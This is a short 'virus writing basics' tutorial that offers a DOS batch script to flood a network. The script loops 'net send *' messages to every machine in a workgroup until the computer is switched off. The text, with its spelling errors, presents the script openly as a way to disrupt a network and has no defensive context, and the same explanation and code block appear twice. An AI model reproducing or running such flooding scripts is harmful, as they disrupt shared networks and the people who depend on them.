Flood your network
This is the virus writing basics section. Today we are going
to show you on flodding the network. This is demonstrated using Dos/Batch
programming.
The below code will temporarily flood network once the user turns off his comp everything will be back to normal.
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
The below code will temporarily flood network once the user turns off his comp everything will be back to normal.
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH